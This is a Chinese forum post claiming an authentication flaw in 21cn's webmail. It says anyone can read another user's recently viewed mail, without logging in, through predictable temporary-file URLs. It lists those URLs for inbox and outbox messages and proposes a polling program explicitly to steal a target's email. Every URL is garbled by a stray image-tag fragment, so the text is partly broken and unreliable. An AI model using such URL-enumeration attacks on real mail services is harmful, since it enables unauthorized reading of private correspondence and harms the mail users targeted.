21cn的邮件系统的大BUG

我轻易地找到了21cn的邮件系统的大BUG。包括它的收费和免费系统！！用轻易的方法我就可以看任何21cn邮件用户信箱中的信件！！！！而且，这是一个根本系统漏洞。2 1cn难以短期内解决。21cn可能只能临时变变路径而已，问题难以短期解决。

我的办法是：
1：用户abc登陆后先后看了第1、2..封信。
2：如果此用户使用WEBMAIL的时间内或退出后30分钟内，在另外一台机器上IE地址栏内输入


http://webmail.21cn.net/tmp/a/abc

src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/1/message.txt


http://webmail.21cn.net/tmp/a/abc

src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/2/message.txt

...
上面字符串中的 /a/ ，其中a是其用户名abc的首位字母。
无需登陆即可取得用户abc的第1、2...封信的原码,虽然有些内容是经过编码，但只要以扩展名为.eml另存到本地即可用OUTLOOK看到全部内容。这是个大漏洞，谁都可以轻易利用。而且举一个很简单的例子：

我想窃取abc的信，只要用户abc是21cn的用户，且可能会使用21cn的web方式收发信，那么我只要编写一个程序，每20分钟轮流访问一遍下列地址：看abc收件箱里的内容 http://webmail.21cn.net/tmp/a/abc

src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/1/message.txt


http://webmail.21cn.net/tmp/a/abc

src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/2/message.txt

... http://webmail.21cn.net/tmp/a/abc

src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/1/500/message.txt

看abc发件箱的内容 http://webmail.21cn.net/tmp/a/abc

src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/2/1/message.txt

http://webmail.21cn.net/tmp/a/abc

src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/2/2/message.txt

... http://webmail.21cn.net/tmp/a/abc

src="http://rina.isforce.org/non/smilies/shot1.gif">cn_net/2/500/message.txt

只要此程序一直运行，用户在WEB上的查看后的信件没有一封能够逃掉。